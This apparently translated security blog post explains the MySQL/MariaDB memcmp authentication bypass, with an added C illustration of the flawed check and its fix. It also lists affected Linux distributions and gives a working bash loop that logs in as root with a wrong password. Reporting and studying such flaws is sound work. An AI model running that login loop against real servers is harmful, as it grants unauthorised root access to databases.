
An amusing vulnerability in MySQL on 64-bit Linux

On Saturday the MariaDB project's security coordinator (petropavel) reported an interesting vulnerability in MySQL / MariaDB affecting versions up to 5.1.61, 5.2.11, 5.3.5 and 5.5.22.

The gist is this: when a user connects to MariaDB / MySQL, a token is computed (a SHA over the password and the scramble) and compared with the expected value. The code assumes that memcmp() returns a value in the range -128..127, but on some platforms (apparently glibc on Linux with an SSE-optimized memcmp) the return value can fall outside that range.

As a result, in 1 case out of 256 the comparison of the hash with the expected value reports a match regardless of the actual hash. In other words, a random password is accepted with probability 1/256.
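The shape of the bug in C, as an added example rather than code from the post or from the MySQL source: the scramble check returns memcmp()'s int through MySQL's one-byte my_bool, shown beside the fixed form, with a constructed memcmp stand-in that returns out-of-range values and a count showing where the 1/256 comes from. The function names, the cmp_fn / check_fn typedefs and the scaling in unclamped_memcmp are assumptions made for the example.

```c
#include <stdio.h>
#define SHA1_HASH_SIZE 20
typedef char my_bool;                                  /* MySQL's my_bool is a plain char */
typedef int (*cmp_fn)(const void *, const void *, size_t);
typedef my_bool (*check_fn)(const unsigned char *, const unsigned char *, cmp_fn);

/* Vulnerable shape of the scramble check: memcmp()'s int result is returned
 * through my_bool, so it is narrowed to one byte. A result such as 256 or
 * -512 becomes 0, which the caller reads as "hashes match" (0 = accepted). */
static my_bool check_scramble_vulnerable(const unsigned char *stage2,
                                         const unsigned char *buf, cmp_fn cmp) {
    return cmp(stage2, buf, SHA1_HASH_SIZE);           /* implicit int -> char */
}

/* Fixed shape: compare the full int against zero before narrowing. */
static my_bool check_scramble_fixed(const unsigned char *stage2,
                                    const unsigned char *buf, cmp_fn cmp) {
    return cmp(stage2, buf, SHA1_HASH_SIZE) != 0;
}

/* Constructed stand-in for an optimized memcmp that does not clamp to -1/0/1.
 * Scaling by 256 zeroes the low byte, so the failure reproduces on every call. */
static int unclamped_memcmp(const void *a, const void *b, size_t n) {
    const unsigned char *x = a, *y = b;
    for (size_t i = 0; i < n; i++)
        if (x[i] != y[i]) return ((int)x[i] - (int)y[i]) * 256;
    return 0;
}

/* One wrong-password attempt through `check`; 0 means it was accepted. */
static int attempt_with_wrong_password(check_fn check) {
    unsigned char expected[SHA1_HASH_SIZE] = {0}, supplied[SHA1_HASH_SIZE] = {0x41};
    return check(expected, supplied, unclamped_memcmp); /* first byte differs */
}

/* How many non-zero memcmp results in [lo, hi] narrow to 0: over a full
 * 16-bit spread of results that is exactly 1 in 256. */
static unsigned count_false_matches(int lo, int hi) {
    unsigned n = 0;
    for (int v = lo; v <= hi; v++) n += (v != 0 && (my_bool)v == 0);
    return n;
}

int main(void) {
    printf("vulnerable check: %s\n", attempt_with_wrong_password(check_scramble_vulnerable) ? "rejected" : "ACCEPTED");
    printf("fixed check:      %s\n", attempt_with_wrong_password(check_scramble_fixed) ? "rejected" : "ACCEPTED");
    printf("results in 1..65536 that narrow to a match: %u\n", count_false_matches(1, 65536));
    return 0;
}
```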

As a result, a simple bash loop gives an attacker root access to a vulnerable MySQL server even without knowing the password:
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

So far the vulnerability has been informally confirmed in the following configurations:

Ubuntu Linux 64-bit (10.04; 10.10; 11.04; 11.10; 12.04)
Debian Linux 64-bit (it is not yet clear in which specific versions)
Arch Linux (same)
Fedora 16 (64-bit)

Users also report configurations in which the vulnerability does not appear to be present:

Official MySQL and MariaDB builds (including Windows)
Red Hat Enterprise Linux, CentOS (32-bit and 64-bit)
Ubuntu Linux 32-bit (10.04, 11.10, 12.04, probably everything)
Debian Linux 6.0.3 64-bit (Version 14.14 Distrib 5.5.18)
Debian Linux lenny 32-bit 5.0.51a-24 + lenny5
Debian Linux lenny 64-bit 5.0.51a-24 + lenny5
Debian Linux lenny 64-bit 5.1.51-1-log
Debian Linux squeeze 64-bit 5.1.49-3-log
Debian Linux squeeze 32-bit 5.1.61-0 + squeeze1
Debian Linux squeeze 64-bit 5.1.61-0 + squeeze1

There is no definitive list of vulnerable and unaffected systems yet.

Joshua Drake of Accuvant Labs has published a program for testing whether a server is affected.

Source: https://habr.com/ru/post/145641/

